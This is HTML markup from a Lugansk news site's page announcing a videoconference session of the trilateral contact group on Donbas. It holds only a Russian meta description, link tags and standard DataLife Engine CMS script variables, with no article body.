<meta property="og:description" content="Сегодня, 27 мая, запланировано очередное заседание трехсторонней контактной группы по урегулированию ситуации на Донбассе. Как сообщил первый заместитель главы делегации Украины в ТКГ, вице-премьер-министр Украины Алексей Резников, рабочее заседание пройдет в формате видеоконференции. Заседание">
<link rel="search" type="application/opensearchdescription+xml" href="http://www.citynews.net.ua/index.php?do=opensearch" title="Новости Луганска и Луганской области. Луганские новости сегодня">
<link rel="canonical" href="http://www.citynews.net.ua/news/83789-segodnja-zaplanirovano-ocherednoe-zasedanie-kontaktnoj-gruppy-po-uregulirovaniju-situacii-na-donbasse.html">
<link rel="alternate" type="application/rss+xml" title="Новости Луганска и Луганской области. Луганские новости сегодня" href="http://www.citynews.net.ua/rss.xml">
<link href="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/editor/css/default.css&amp;v=25" rel="stylesheet" type="text/css">
<script src="/engine/classes/min/index.php?charset=utf-8&amp;g=general&amp;v=25"></script>
<script src="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/classes/js/jqueryui.js,engine/classes/js/dle_js.js&amp;v=25" defer></script>
<script>
<!--
var dle_root       = '/';
var dle_admin      = '';
var dle_login_hash = 'd5acbb30b3f3e4eafad0bc3dcca6741c053ac0ec';
var dle_group      = 5;
var dle_skin       = 'v2';
var dle_wysiwyg    = '2';
var quick_wysiwyg  = '0';
var dle_act_lang   = ["Да", "Нет", "Ввод", "Отмена", "Сохранить", "Удалить", "Загрузка. Пожалуйста, подождите..."];
var menu_short     = 'Быстрое редактирование';
var menu_full      = 'Полное редактирование';
var menu_profile   = 'Просмотр профиля';
var menu_send      = 'Отправить сообщение';
var menu_uedit     = 'Админцентр';
var dle_info       = 'Информация';
var dle_confirm    = 'Подтверждение';
var dle_prompt     = 'Ввод информации';
var dle_req_field  = 'Заполните все необходимые поля';
var dle_del_agree  = 'Вы действительно хотите удалить? Данное действие невозможно будет отменить';
var dle_spam_agree = 'Вы действительно хотите отметить пользователя как спамера? Это приведёт к удалению всех его комментариев';
var dle_complaint  = 'Укажите текст Вашей жалобы для администрации:';
var dle_big_text   = 'Выделен слишком большой участок текста.';
var dle_orfo_title = 'Укажите комментарий для администрации к найденной ошибке на странице';
var dle_p_send     = 'Отправить';
var dle_p_send_ok  = 'Уведомление успешно отправлено';
var dle_save_ok    = 'Изменения успешно сохранены. Обновить страницу?';
var dle_reply_title= 'Ответ на комментарий';
var dle_tree_comm  = '0';
var dle_del_news   = 'Удалить статью';
var dle_sub_agree  = 'Вы действительно хотите подписаться на комментарии к данной публикации?';
var allow_dle_delete_news   = false;

//-->
</script>
</body>
</html>
<!-- DataLife Engine Copyright SoftNews Media Group (http://dle-news.ru) -->
